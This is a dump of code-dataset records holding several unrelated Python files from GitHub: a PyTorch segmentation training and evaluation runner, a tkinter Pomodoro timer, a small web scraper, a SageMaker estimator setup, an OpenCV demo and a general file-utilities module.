torch.cuda.amp.autocast():\n pred = model(X)\n losses = loss_fn(pred, y)\n loss = losses.mean()\n \n # Backpropagation\n scaler.scale(loss).backward()\n scaler.step(optimizer)\n scaler.update()\n optimizer.zero_grad()\n \n # measure elapsed time\n batch_time.update(time.time() - tic)\n tic = time.time()\n \n # update average loss\n ave_loss.update(loss.item())\n lr = adjust_learning_rate(\n optimizer, config['BASE_LR'], config['END_LR'], step+steps_tot, config['DECAY_STEPS'])\n optimizer.param_groups[0]['lr'] = lr\n \n msg = '\\r Training --- Iter:[{}/{}], Loss: {:.5f}, lr: {:.7f}, Time: {:.2f}'.format(\n step, steps_per_epoch, ave_loss.average(), optimizer.param_groups[0]['lr'], batch_time.average())\n #logging.info(msg)\n \n writer.add_scalar('train_loss', ave_loss.average(), global_steps)\n writer_dict['train_global_steps'] = global_steps + 1\n\n\ndef validate(config, dataloader, model, loss_fn, writer_dict):\n model.eval()\n \n ave_loss = AverageMeter()\n iter_steps = len(dataloader.dataset) // config['BATCH_SIZE'] \n confusion_matrix = np.zeros((config['NUM_CLASSES'], config['NUM_CLASSES'], 1))\n \n with torch.no_grad():\n for idx, batch in enumerate(dataloader):\n x, y, _, _ = batch\n size = y.size()\n X, y = X.cuda(), y.long().cuda()\n \n pred = model(X)\n losses = loss_fn(pred, y)\n loss = losses.mean() \n \n if not isinstance(pred, (list, tuple)):\n pred = [pred] \n for i, x in enumerate(pred):\n confusion_matrix[..., i] += get_confusion_matrix(\n y, x, size, config['NUM_CLASSES'], config['IGNORE_LABEL'])\n ave_loss.update(loss.item())\n \n pos = confusion_matrix[..., 0].sum(1)\n res = confusion_matrix[..., 0].sum(0)\n tp = np.diag(confusion_matrix[..., 0])\n IoU_array = (tp / np.maximum(1.0, pos + res - tp))\n mean_IoU = IoU_array.mean()\n \n writer = writer_dict['writer']\n global_steps = writer_dict['valid_global_steps']\n writer.add_scalar('valid_loss', ave_loss.average(), global_steps)\n writer.add_scalar('valid_mIoU', mean_IoU, global_steps)\n for key, val in trainid2label.items():\n if key != config['IGNORE_LABEL'] and key != -1:\n writer.add_scalar('valid_mIoU_{}'.format(val.name), IoU_array[key], global_steps) \n writer_dict['valid_global_steps'] = global_steps + 1\n \n return ave_loss.average(), mean_IoU, IoU_array\n\n\ndef testval(config, testloader, model, sv_dir='', sv_pred=False):\n model.eval()\n confusion_matrix = np.zeros((config['NUM_CLASSES'], config['NUM_CLASSES']))\n \n with torch.no_grad():\n for index, batch in enumerate(tqdm(testloader)):\n image, label, _, name, *border_padding = batch\n size = label.size()\n image, label = image.cuda(), label.long().cuda()\n pred = testloader.dataset.inference(model, image)\n\n confusion_matrix += get_confusion_matrix(\n label, pred, size, config['NUM_CLASSES'], config['IGNORE_LABEL'])\n\n if index % 100 == 0:\n logging.info('processing: %d images' % index)\n pos = confusion_matrix.sum(1)\n res = confusion_matrix.sum(0)\n tp = np.diag(confusion_matrix)\n IoU_array = (tp / np.maximum(1.0, pos + res - tp))\n mean_IoU = IoU_array.mean()\n logging.info('mIoU: %.4f' % (mean_IoU))\n \n if sv_pred:\n sv_path = os.path.join(sv_dir, 'test_results')\n if not os.path.exists(sv_path):\n os.mkdir(sv_path)\n testloader.dataset.save_pred(image, pred, sv_path, name)\n\n pos = confusion_matrix.sum(1)\n res = confusion_matrix.sum(0)\n tp = np.diag(confusion_matrix)\n pixel_acc = tp.sum()/pos.sum()\n mean_acc = (tp/np.maximum(1.0, pos)).mean()\n IoU_array = (tp / np.maximum(1.0, pos + res - tp))\n mean_IoU = IoU_array.mean()\n\n return mean_IoU, IoU_array, pixel_acc, mean_acc\n\n\ndef testvideo(config, testloader, model, sv_dir='', sv_pred=False):\n model.eval()\n\n with torch.no_grad():\n for index, batch in enumerate(tqdm(testloader)):\n image, _, name, *border_padding = batch\n size = image.size()\n image = image.cuda()\n pred = testloader.dataset.inference(model, image)\n \n if sv_pred:\n sv_path = os.path.join(sv_dir, 'video_frames')\n if not os.path.exists(sv_path):\n os.mkdir(sv_path)\n testloader.dataset.save_pred(image, pred, sv_path, name)\n\n print(\"done!\")\n","repo_name":"camlaedtke/pytorch_experiments","sub_path":"utils/runners.py","file_name":"runners.py","file_ext":"py","file_size_in_byte":5774,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"70882562339","text":"from tkinter import *\nimport math\n# ---------------------------- CONSTANTS ------------------------------- #\nPINK = \"#e2979c\"\nRED = \"#e7305b\"\nGREEN = \"#9bdeac\"\nYELLOW = \"#f7f5dd\"\nFONT_NAME = \"Courier\"\nWORK_MIN = 25\nSHORT_BREAK_MIN = 5\nLONG_BREAK_MIN = 20\nreps = 0\ntimers = None\n\n\n# ---------------------------- TIMER RESET ------------------------------- #\ndef reset_timer():\n window.after_cancel(timers)\n timer.config(text=\"Timer\", fg=GREEN)\n check_mark.config(text=\"\")\n my_canvas.itemconfig(timer_text, text=\"00:00\")\n global reps\n reps = 0\n\n\n\n# ---------------------------- TIMER MECHANISM ------------------------------- # \ndef start_button():\n global reps\n reps+=1\n\n if reps % 8 == 0:\n count_down(60*LONG_BREAK_MIN)\n change_title(\"Long Break\", PINK)\n elif reps % 2 == 0:\n count_down(60*SHORT_BREAK_MIN)\n change_title(\"Break\", RED)\n else:\n\n count_down(60 * WORK_MIN)\n change_title(\"Work\", GREEN)\n new_mark = \"\"\n work_session = math.floor(reps/2)\n for x in range(work_session):\n new_mark += \"✔\"\n check_mark.config(text=new_mark)\n\n# ---------------------------- COUNTDOWN MECHANISM ------------------------------- # \ndef count_down(count):\n global timers\n count_min = math.floor(count/ 60)\n count_sec = count % 60\n if count_sec < 10:\n count_sec = f\"0{count_sec}\"\n if count_sec ==0:\n count_sec =\"00\"\n if count_min == 0:\n count_min = \"00\"\n my_canvas.itemconfig(timer_text, text=f\"{count_min}:{count_sec}\")\n if count > 0:\n timers = window.after(1000, count_down, count-1)\n else:\n start_button()\n\n# ---------------------------- UI SETUP ------------------------------- #\nwindow = Tk()\nwindow.title(\"Pomodoro\")\nwindow.config(padx=100, pady=50, bg= YELLOW)\n\nmy_canvas = Canvas(width=200, height=224, bg= YELLOW, highlightthickness=0)\ntomato_img = PhotoImage(file=\"tomato.png\")\n\nmy_canvas.create_image(100, 112, image=tomato_img)\ntimer_text = my_canvas.create_text(100, 130, text=\"00:00\", fill=\"white\", font=(FONT_NAME, 35, \"bold\"))\nmy_canvas.grid(row=1, column=1)\n\n\n\ntimer = Label(text=\"Timer\", font=(FONT_NAME, 40, \"bold\"), bg=YELLOW, fg=GREEN)\ntimer.grid(row=0, column=1)\n\ndef change_title(textn, color):\n timer.config(text=textn, fg=color, font=(FONT_NAME, 40, \"bold\"), bg=YELLOW)\n\n\nstar_button = Button(text=\"Start\", command=start_button, highlightthickness=0)\nstar_button.grid(row=2, column=0)\n\nreset_button = Button(text=\"Reset\", command=reset_timer, highlightthickness=0)\nreset_button.grid(row=2, column=2)\n\ncheck_mark = Label(font=(FONT_NAME, 15, \"normal\"), bg=YELLOW, fg=GREEN)\ncheck_mark.grid(row=3, column=1)\nmark = \"\"\n\n\n\n\n\n\nwindow.mainloop()","repo_name":"dilshod996/pomodoro-times","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2729,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"73331331937","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\"\"\"\n__title__ = ''\n__author__ = 'PJ'\n__mtime__ = '2018/3/14'\n# code is far away from bugs with the god animal protecting\n I love animals. They taste delicious.\n\"\"\"\n\nfrom urllib import request, parse\nfrom bs4 import BeautifulSoup\nimport re\n\nhttp = 'http://www.10010.com/net5/051/'\n\ndef Login():\n\treq = request.Request(http)\n\turl = request.urlopen(req)\n\tbsObj = BeautifulSoup(url.read(), 'lxml')\n\n\tfor a in bsObj.findAll('div', class_=re.compile('user_phone line_block cur_pointer fl')):\n\t\tprint(a)\n\nif __name__ == '__main__':\n Login()","repo_name":"SilenceJR/mzi","sub_path":"联通.py","file_name":"联通.py","file_ext":"py","file_size_in_byte":585,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"27555612972","text":"import os\nfrom sagemaker.tensorflow import TensorFlow\n\n# ESTIMATOR CONFIGURATION\nJOB_NAME='example-tf-estimator-with-io'\nTAGS=[\n {\"Key\":\"info:creator\",\n \"Value\":\"theodoros\"},\n {\"Key\":\"info:maintainer\",\n \"Value\":\"theodoros\"},\n {\"Key\":\"info:product\",\n \"Value\":\"datascience\"},\n {\"Key\":\"info:env\",\n \"Value\":\"dev\"},\n]\n\nROLE_SAGEMAKER='arn:aws:iam::513905722774:role/service-role/AmazonSageMaker-ExecutionRole-20200914T153095'\nINSTANCE_TYPE='ml.p3.2xlarge'\nINSTANCE_COUNT=1\n\nPYTHON_VERSION='py3'\nTF_VERSION='1.15'\n\nMODEL_DIR = '/opt/ml/model'\nMODEL_FILE=os.path.join(\"..\",\"Scripts\",\"audio_tf_training_with_io.py\")\nOUTPUT_PATH='s3://sagemaker-us-east-1-513905722774/sagemaker_examples/trained_model'\n\n# MODEL CONFIGURATION\nHYPERPARAMETERS = {\n 'epochs': 50,\n 'batch_size': 4,\n 'learning_rate': 0.0001\n}\n\n\n# FIT CONFIGURATION\nINPUTS={\n 'train':'s3://sagemaker-us-east-1-513905722774/sagemaker_examples/data/temp_audio_features/train',\n 'test':'s3://sagemaker-us-east-1-513905722774/sagemaker_examples/data/temp_audio_features/test'\n}\n\n\n\n# ESTIMATOR BUILD AND FIT\nestimator = TensorFlow(\n hyperparameters=HYPERPARAMETERS,\n base_job_name=JOB_NAME,\n tags=TAGS,\n py_version=PYTHON_VERSION,\n framework_version=TF_VERSION,\n role=ROLE_SAGEMAKER,\n instance_type=INSTANCE_TYPE,\n instance_count=INSTANCE_COUNT,\n model_dir=MODEL_DIR,\n entry_point=MODEL_FILE,\n output_path=OUTPUT_PATH\n)\nestimator.fit(INPUTS)\n","repo_name":"grigorisB/AWS_Examples","sub_path":"SageMaker/tf_estimator_with_io.py","file_name":"tf_estimator_with_io.py","file_ext":"py","file_size_in_byte":1465,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"30908595707","text":"import cv2\nimport numpy as np\n\nimg = cv2.imread(\"res/tiger.jpg\")\n\nhor = np.hstack((img, img, img))\nver = np.vstack((img,img))\n\ncv2.imshow(\"horizontal\", hor)\ncv2.imshow(\"vertical\", ver)\n\n\nwhile True:\n if cv2.waitKey(0) & 0xFF == ord(\"q\"):\n break","repo_name":"tigerbombz/ATHackathon","sub_path":"chapter6.py","file_name":"chapter6.py","file_ext":"py","file_size_in_byte":254,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"34"} +{"seq_id":"38319690968","text":"a = list(input(\"Enter some numbers\"))\nmin = -123455322\nmax = 123455322\n\n# using sort()\n# a.sort()\n# print(a[0], a[len(a)-1])\n\n# without using sort()\nfor i in a:\n i = int(i)\n if i > min:\n min = i\nfor j in a:\n j = int(j)\n if j < max:\n max = j\n\nprint(\"maximum: \", min, \"minimum: \", max)\n","repo_name":"gmonu/Python-Programs","sub_path":"python450/2.py","file_name":"2.py","file_ext":"py","file_size_in_byte":310,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"34"} +{"seq_id":"35559178004","text":"import errno\nimport fnmatch\nimport hashlib\nimport logging\nimport os\nimport platform\nimport re\nimport shutil\nimport tempfile\nfrom datetime import datetime\nfrom enum import Enum\nfrom pathlib import Path\nfrom typing import List, Dict, Any, Tuple, Iterable\nfrom stat import ST_SIZE\nfrom stat import ST_MTIME\n\nimport humanize\n\nfrom pythoncommons.date_utils import timeit\n\nLOG = logging.getLogger(__name__)\n\n\nclass FileMatchType(Enum):\n regex = \"regex\"\n fnmatch = \"fnmatch\"\n\n\nclass FindResultType(Enum):\n FILES = \"files\"\n DIRS = \"dirs\"\n\n\nclass FileFinderCriteria:\n def __init__(self, exclude_dirs, extension, regex_pattern, parent_dir, full_path_result):\n self.exclude_dirs = exclude_dirs\n self.extension = extension\n self.regex_pattern = regex_pattern\n self.full_path_result = full_path_result\n self.parent_dir = parent_dir\n\n\nclass FileFinder:\n old_debug: bool = False\n debug: bool = False\n LOG_PREFIX = \"[FINDING FILES]\"\n\n @classmethod\n def _smartlog(cls, s: str):\n if cls.debug:\n LOG.debug(f\"{cls.LOG_PREFIX} {s}\")\n\n @classmethod\n def _is_file_matches_criteria(cls, file, parent_dir, criteria: FileFinderCriteria):\n if (\n (criteria.extension and not file.endswith(\".\" + criteria.extension))\n or (criteria.regex_pattern and not criteria.regex_pattern.match(file))\n or (criteria.parent_dir and not criteria.parent_dir == parent_dir)\n ):\n return False\n return True\n\n @staticmethod\n def _get_os_walk_kwargs(exclude_dirs):\n oswalk_kwargs: Dict[str, Any] = {}\n if exclude_dirs:\n # When topdown is True, the caller can modify the dirnames list in-place\n # (perhaps using del or slice assignment),\n # and walk() will only recurse into the subdirectories whose names remain in dirnames;\n # this can be used to prune the search\n oswalk_kwargs[\"topdown\"] = True\n return oswalk_kwargs\n\n @classmethod\n def _handle_dir_exclusions(cls, dirs, exclude_dirs):\n if exclude_dirs:\n # Not enough to check against basename(root) as all other dirs underneath will be walked on the next\n # invocation of the walk generator with the loop statement\n orig_dirs = dirs.copy()\n dirs[:] = [d for d in dirs if d not in exclude_dirs]\n if len(orig_dirs) != len(dirs):\n cls._smartlog(f\"Excluded dirs: {list(set(orig_dirs) - set(dirs))}\")\n return dirs\n\n @classmethod\n def _find_files(cls, root, files, criteria: FileFinderCriteria) -> List[str]:\n result: List[str] = []\n for file in files:\n cls._smartlog(f\"Processing file: {file}\")\n if cls._is_file_matches_criteria(file, FileUtils.basename(root), criteria):\n cls._smartlog(f\"File matched: {file}\")\n if criteria.full_path_result:\n result.append(FileUtils.join_path(root, file))\n else:\n result.append(file)\n return result\n\n @classmethod\n def _find_dirs(cls, root, dirs, criteria: FileFinderCriteria) -> List[str]:\n result: List[str] = []\n for dir in dirs:\n cls._smartlog(f\"Processing dir: {dir}\")\n if cls._is_file_matches_criteria(dir, FileUtils.basename(root), criteria):\n cls._smartlog(f\"Dir matched: {dir}\")\n if criteria.full_path_result:\n result.append(FileUtils.join_path(root, dir))\n else:\n result.append(dir)\n return result\n\n @classmethod\n def find_files(\n cls,\n basedir: str,\n find_type: FindResultType,\n regex: str = None,\n parent_dir: str = None,\n single_level=False,\n full_path_result=False,\n extension=None,\n debug=False,\n exclude_dirs: List[str] = None,\n ensure_number_of_results: int = None,\n ):\n cls.old_debug = cls.debug\n cls.debug = debug\n find_criteria: FileFinderCriteria = cls._get_criteria_from_args(\n exclude_dirs, extension, regex, parent_dir, full_path_result\n )\n result_files: List[str] = []\n for root, dirs, files in os.walk(basedir, **FileFinder._get_os_walk_kwargs(exclude_dirs)):\n cls._smartlog(f\"Processing root: {root}, dirs: {dirs}\")\n dirs[:] = cls._handle_dir_exclusions(dirs, exclude_dirs)\n if find_type == FindResultType.FILES:\n result_files.extend(cls._find_files(root, files, find_criteria))\n elif find_type == FindResultType.DIRS:\n result_files.extend(cls._find_dirs(root, dirs, find_criteria))\n if single_level:\n # TODO bug: if single level = True, ensure_number_of_results validation won't be executed\n return result_files\n cls.debug = cls.old_debug\n\n if ensure_number_of_results:\n if len(result_files) != ensure_number_of_results:\n raise ValueError(\n \"Number of results is not equal to expected result size! Expected: {}, Actual: {}\".format(\n ensure_number_of_results, len(result_files)\n )\n )\n return result_files\n\n @classmethod\n def _get_criteria_from_args(cls, exclude_dirs, extension, regex, parent_dir, full_path_result):\n saved_args = locals().copy()\n cls._smartlog(f\"Received args: {saved_args}\")\n if not exclude_dirs:\n exclude_dirs = []\n # Preprocess\n if extension:\n if extension.startswith(\".\") or extension.startswith(\"*.\"):\n extension = extension.split(\".\")[-1]\n cls._smartlog(f\"Filtering files with extension: {extension}\")\n regex_pattern = re.compile(regex) if regex else None\n cls._smartlog(f\"Modified args: {locals()}\")\n return FileFinderCriteria(exclude_dirs, extension, regex_pattern, parent_dir, full_path_result)\n\n\nclass FileUtils:\n previous_cwd = None\n\n # TODO consolidate with save_to_file\n @classmethod\n def write_to_file(cls, file_path, data, bytes=False):\n file_access_mode = \"w\"\n if bytes:\n file_access_mode = \"wb\"\n f = open(file_path, file_access_mode)\n f.write(data)\n f.close()\n\n @classmethod\n def write_to_tempfile(cls, contents):\n tmp = tempfile.NamedTemporaryFile(delete=False)\n with open(tmp.name, \"w\") as f:\n f.write(contents)\n return tmp.name\n\n @classmethod\n def save_to_file(cls, file_path, contents):\n FileUtils.ensure_file_exists(file_path, create=True)\n file = open(file_path, \"w\")\n file.write(contents)\n file.close()\n\n @classmethod\n def append_to_file(cls, file_path, contents):\n file = open(file_path, \"a\")\n file.write(contents)\n file.close()\n\n @classmethod\n def prepend_to_file(cls, file, line):\n with open(file, \"r+\") as f:\n content = f.read()\n f.seek(0, 0)\n f.write(line.rstrip(\"\\r\\n\") + \"\\n\" + content)\n\n @classmethod\n def append_data_to_file(cls, path, data):\n dirname = os.path.dirname(path)\n if not os.path.exists(dirname):\n os.makedirs(dirname)\n file = open(path, \"a\")\n file.write(data)\n file.close()\n\n @classmethod\n def ensure_dir_created(cls, dirname, log_exception=False):\n \"\"\"\n Ensure that a named directory exists; if it does not, attempt to create it.\n \"\"\"\n try:\n os.makedirs(dirname)\n except OSError as e:\n if log_exception:\n LOG.exception(\"Failed to create dirs\", exc_info=True)\n # If Errno is File exists, don't raise Exception\n if e.errno != errno.EEXIST:\n raise\n return dirname\n\n @classmethod\n def ensure_all_files_exist(cls, files):\n for file in files:\n if not os.path.isfile(file):\n raise Exception(file + \" does not exist!\")\n\n @classmethod\n def ensure_file_exists(cls, path, create=False):\n if not path:\n raise ValueError(\"Path parameter should not be None or empty!\")\n\n if not create and not os.path.exists(path):\n raise ValueError(\"No such file or directory: {}\".format(path))\n\n path_comps = path.split(os.sep)\n dirs = path_comps[:-1]\n dirpath = os.sep.join(dirs)\n if not os.path.exists(dirpath):\n LOG.info(\"Creating dirs: %s\", dirpath)\n FileUtils.ensure_dir_created(dirpath, log_exception=False)\n\n if not os.path.exists(path):\n # Create empty file: https://stackoverflow.com/a/12654798/1106893\n LOG.info(\"Creating file: %s\", path)\n open(path, \"a\").close()\n\n @classmethod\n def ensure_file_exists_and_readable(cls, file, verbose=False):\n if verbose:\n LOG.info(\"Trying to open file %s for reading..\", file)\n f = open(file, \"r\")\n if not f.readable():\n raise ValueError(\"File {} is not readable\".format(file))\n return file\n\n @classmethod\n def ensure_file_exists_and_writable(cls, file, verbose=False):\n if verbose:\n LOG.info(\"Trying to open file %s for writing..\", file)\n f = open(file, \"w\")\n if not f.writable():\n raise ValueError(\"File {} is not readable\".format(file))\n return file\n\n @classmethod\n def ensure_dir_is_writable(cls, d):\n is_dir = FileUtils.is_dir(d)\n if not is_dir:\n raise ValueError(\"%s is not a directory!\", d)\n\n writable = os.access(d, os.W_OK)\n if not writable:\n raise ValueError(\"Directory is not writable: %s\", d)\n\n @classmethod\n def ensure_parent_dir_is_writable(cls, f):\n path = Path(f)\n parent_dir = path.parent\n writable = os.access(parent_dir.__str__(), os.W_OK)\n if not writable:\n raise ValueError(\"Parent directory is not writable: %s\", parent_dir)\n\n @classmethod\n def ensure_dir_is_empty(cls, d):\n is_dir = FileUtils.is_dir(d)\n if not is_dir:\n raise ValueError(\"%s is not a directory!\", d)\n\n if not FileUtils.is_dir_empty(d):\n raise ValueError(\"Directory is not empty: %s\", d)\n\n @classmethod\n def is_dir_empty(cls, d):\n children = os.listdir(d)\n if len(children) == 0:\n return True\n return False\n\n @staticmethod\n def search_files(basedir, filename):\n result = []\n for dp, dn, filenames in os.walk(basedir):\n for f in filenames:\n if f == filename:\n result.append(os.path.join(dp, f))\n return result\n\n @staticmethod\n def search_dir(basedir, dirname):\n result = []\n for root, dirs, files in os.walk(basedir):\n for d in dirs:\n if d == dirname:\n return os.path.join(root, d)\n return result\n\n @staticmethod\n def find_repo_root_dir(current_script: str, root_dir_name: str, raise_error=True):\n orig_path = os.path.realpath(current_script)\n path = orig_path\n visited = [path]\n while path != os.sep and not path.endswith(root_dir_name):\n path = FileUtils.get_parent_dir_name(path)\n visited.append(path)\n if path == os.sep:\n message = \"Failed to find directory '{}' starting from path '{}'. \" \"Visited: {}\".format(\n root_dir_name, orig_path, visited\n )\n if raise_error:\n raise ValueError(message)\n else:\n LOG.error(message)\n return path\n\n @staticmethod\n def find_repo_root_dir_auto(curr_file, files_to_search: List[str] = None, raise_error=True):\n def _does_files_exist_in_dir(d):\n if not FileUtils.is_dir(d, throw_ex=False):\n return False\n LOG.debug(f\"Listing files in dir {d}\")\n files = os.listdir(d)\n LOG.debug(f\"Found files in dir '{d}': {files}\")\n return all(f in files and FileUtils.is_file(FileUtils.join_path(d, f)) for f in files_to_search)\n\n if not files_to_search:\n files_to_search = [\"pyproject.toml\"]\n\n orig_path = os.path.realpath(curr_file)\n path = orig_path\n visited = [path]\n while path != os.sep and not _does_files_exist_in_dir(path):\n LOG.debug(f\"Finding root dir: Current path is: {path}\")\n path = FileUtils.get_parent_dir_name(path)\n LOG.debug(f\"Finding root dir: Moving up the path, new path is: {path}\")\n visited.append(path)\n\n if raise_error and path == os.sep:\n raise ValueError(\n f\"Failed to find project root directory starting from path '{orig_path}'. \" f\"Visited: {visited}\"\n )\n\n return path, visited\n\n # TODO rename method\n @classmethod\n def find_files(\n cls,\n basedir,\n find_type: FindResultType = FindResultType.FILES,\n regex: str = None,\n parent_dir: str = None,\n single_level=False,\n full_path_result=False,\n extension=None,\n debug=False,\n exclude_dirs: List[str] = None,\n ensure_number_of_results: int = None,\n ):\n args = locals().copy()\n del args[\"cls\"]\n return FileFinder.find_files(**args)\n\n @staticmethod\n def list_files_in_dir(dir, pattern=None):\n LOG.info(\"Listing files in dir: \" + dir)\n if not pattern:\n result = [f for f in os.listdir(dir) if os.path.isfile(os.path.join(dir, f))]\n else:\n result = []\n for f in os.listdir(dir):\n file_path = os.path.join(dir, f)\n if os.path.isfile(file_path) and FileUtils.does_filename_match(f, pattern, FileMatchType.fnmatch):\n result.append(file_path)\n return result\n\n @classmethod\n def does_filename_match(cls, filename, pattern, pattern_match_type):\n if pattern_match_type == FileMatchType.fnmatch and fnmatch.fnmatch(filename, pattern):\n return True\n elif pattern_match_type == FileMatchType.regex and re.search(pattern, filename, re.DOTALL):\n return True\n return False\n\n @classmethod\n def get_path_from_basedir(cls, basedir, path, include_last_dir=False):\n basedir_idx = path.rindex(basedir)\n start_idx = basedir_idx + len(basedir)\n if not basedir[-1] == os.sep:\n start_idx += len(os.sep)\n if include_last_dir:\n end_idx = len(path)\n else:\n end_idx = path.rindex(os.path.sep) + 1\n return path[start_idx:end_idx]\n\n @classmethod\n def remove_files(cls, dir, pattern):\n from pythoncommons.string_utils import RegexUtils\n\n if not FileUtils.does_file_exist(dir):\n LOG.warning(\"Directory does not exist: %s\", dir)\n return\n for filename in os.listdir(dir):\n file_path = FileUtils.join_path(dir, filename)\n matches = RegexUtils.ensure_matches_pattern(FileUtils.path_basename(file_path), pattern)\n if not matches:\n LOG.debug(\"Filename not matched: %s\", file_path)\n continue\n try:\n if os.path.isfile(file_path) or os.path.islink(file_path):\n os.unlink(file_path)\n elif os.path.isdir(file_path):\n shutil.rmtree(file_path)\n LOG.debug(\"Successfully removed file: %s\", file_path)\n except Exception as e:\n LOG.error(\"Failed to delete %s. Reason: %s\", file_path, e)\n\n @classmethod\n def remove_file(cls, path):\n if not os.path.exists(path):\n LOG.warning(\"Cannot remove file as it does not exist: %s\", path)\n os.remove(path)\n\n @classmethod\n def remove_all_files_in_dir(cls, dir, endswith=\"lock\"):\n if not os.path.exists(dir):\n LOG.error(\"Can't delete files in dir as dir does not exist: %s\", dir)\n return\n for filename in os.listdir(dir):\n file_path = os.path.join(dir, filename)\n try:\n if os.path.isfile(file_path) or os.path.islink(file_path):\n if endswith:\n if file_path.endswith(endswith):\n os.unlink(file_path)\n else:\n LOG.warning(\"Skip removing file, does not end with: %\", endswith)\n else:\n os.unlink(file_path)\n # elif os.path.isdir(file_path):\n # shutil.rmtree(file_path)\n except Exception as e:\n print(\"Failed to delete %s. Reason: %s\" % (file_path, e))\n\n @classmethod\n def remove_dir(cls, dir, force=False):\n protected_dirs = (\"/\", \"~\")\n if dir in protected_dirs:\n LOG.warning(\n \"Remove dir was invoked with directory: %s, which is in the protected dirs: %s\", dir, protected_dirs\n )\n return\n if force:\n shutil.rmtree(dir, ignore_errors=True)\n else:\n os.rmdir(dir)\n\n @staticmethod\n def copy_files_to_dir(files: List[str], dst_dir: str, cut_path: str = None, cut_basedir: bool = False):\n LOG.debug(\"Copying files '%s' to destination dir: '%s'\", files, dst_dir)\n for f in files:\n dest_filename = f\n if cut_path:\n if not f.startswith(cut_path):\n raise ValueError(f\"Expected cut_path '{cut_path}' to be in beginning of file's full path: {f}\")\n dest_filename = FileUtils.join_path(*f.split(cut_path))\n if dest_filename.startswith(os.sep):\n dest_filename = dest_filename[1:]\n if cut_basedir:\n dest_filename = os.path.basename(f)\n\n dest_file_path = os.path.join(dst_dir, dest_filename)\n FileUtils.ensure_file_exists(dest_file_path, create=True)\n LOG.debug(\"Copying %s to %s\", f, dest_file_path)\n shutil.copyfile(f, dest_file_path)\n\n @staticmethod\n def copy_file_to_dir(src_file, dst_dir, dst_file_name_func, msg_template=None):\n dest_filename = dst_file_name_func(src_file, dst_dir)\n dest_file_path = os.path.join(dst_dir, dest_filename)\n\n if msg_template:\n LOG.info(msg_template.format(src_file, dest_file_path))\n shutil.copyfile(src_file, dest_file_path)\n return dest_file_path\n\n @classmethod\n def get_formatted_file_sizes_in_dir(cls, db_copies_dir, since: datetime = None):\n result = \"\"\n file_data = cls.get_file_sizes_with_mod_dates_in_dir(db_copies_dir)\n for fd in file_data:\n include = True\n if since:\n mod_date_of_file = datetime.fromtimestamp(float(fd[2]))\n if mod_date_of_file < since:\n include = False\n LOG.debug(f\"Mod date of file < since, dropping it. File was: {fd[0]}\")\n\n if include:\n human_readable_size = humanize.naturalsize(fd[1], gnu=True)\n result += \"{size} {file}\\n\".format(size=human_readable_size, file=fd[0])\n return result\n\n @classmethod\n def get_file_sizes_in_dir(cls, db_copies_dir):\n return cls._get_files_with_attrs_in_dir(db_copies_dir, [ST_SIZE])\n\n @classmethod\n def _get_files_with_attrs_in_dir(cls, db_copies_dir: str, stat_attrs_idx: List[int]):\n files = os.listdir(db_copies_dir)\n result = []\n for f in files:\n file_path = os.path.join(db_copies_dir, f)\n tup = (file_path,)\n for attr_idx in stat_attrs_idx:\n file_stats = os.stat(file_path)\n tup = tup + (file_stats[attr_idx],)\n result.append(tup)\n return result\n\n @classmethod\n def get_creation_time(cls, file_path):\n \"\"\"\n Try to get the date that a file was created, falling back to when it was\n last modified if that isn't possible.\n See http://stackoverflow.com/a/39501288/1709587 for explanation.\n Answer: https://stackoverflow.com/a/39501288/1106893\n \"\"\"\n if platform.system() == \"Windows\":\n return os.path.getctime(file_path)\n else:\n stat = os.stat(file_path)\n try:\n return stat.st_birthtime\n except AttributeError:\n # We're probably on Linux. No easy way to get creation dates here,\n # so we'll settle for when its content was last modified.\n return stat.st_mtime\n\n @classmethod\n def get_file_sizes_with_mod_dates_in_dir(cls, dir):\n return cls._get_files_with_attrs_in_dir(dir, [ST_SIZE, ST_MTIME])\n\n @classmethod\n def get_file_extension(cls, filename):\n filename, ext = os.path.splitext(filename)\n ext = ext.replace(\".\", \"\")\n return ext\n\n @classmethod\n def does_file_exist(cls, file):\n return os.path.exists(file)\n\n @classmethod\n def does_path_exist(cls, path):\n return os.path.exists(path)\n\n @classmethod\n def create_files(cls, *files):\n for file in files:\n FileUtils.ensure_file_exists(file, create=True)\n\n @classmethod\n def create_new_empty_file(cls, path):\n dirname = os.path.dirname(path)\n if not os.path.exists(dirname):\n os.makedirs(dirname)\n file = open(path, \"w\")\n file.close()\n\n @classmethod\n def create_new_dir(cls, path, fail_if_created=True):\n if not os.path.exists(path):\n os.makedirs(path)\n elif fail_if_created:\n raise ValueError(\"Directory already exist: %s\", path)\n\n @classmethod\n def verify_if_dir_is_created(cls, path, raise_ex=True):\n if not os.path.exists(path) or not os.path.isdir(path):\n if raise_ex:\n raise ValueError(\"Directory is not created under path: \" + path)\n return False\n return True\n\n @classmethod\n def get_file_size(cls, file_path, human_readable=True):\n from pathlib import Path\n\n size = Path(file_path).stat().st_size\n if human_readable:\n return humanize.naturalsize(size, gnu=True)\n else:\n return str(size)\n\n @classmethod\n def check_size_match(cls, size, filepath):\n size_on_disk = FileUtils._get_file_size(filepath)\n return size_on_disk == int(size)\n\n @classmethod\n def check_size_less(cls, size, filepath):\n size_on_disk = FileUtils._get_file_size(filepath)\n return int(size) < size_on_disk\n\n @classmethod\n def _get_file_size(cls, f):\n return os.stat(f).st_size\n\n @classmethod\n def get_file_last_modified_date(cls, f):\n return os.path.getmtime(f)\n\n @classmethod\n def get_mod_date_of_file(cls, file):\n return os.path.getmtime(file)\n\n @classmethod\n def path_basename(cls, path):\n return os.path.basename(path)\n\n @classmethod\n def basename(cls, path):\n return os.path.basename(path)\n\n @classmethod\n def join_path(cls, *components):\n if components and components[0] and not components[0].startswith(os.sep) and not components[0].startswith(\"~\"):\n lst = list(components)\n lst[0] = os.sep + components[0]\n components = tuple(lst)\n return os.path.join(*components)\n\n @classmethod\n def make_path(cls, basedir, dirs):\n if not isinstance(dirs, list):\n LOG.warning(\n \"%s was called with wrong argument type for 'dirs', 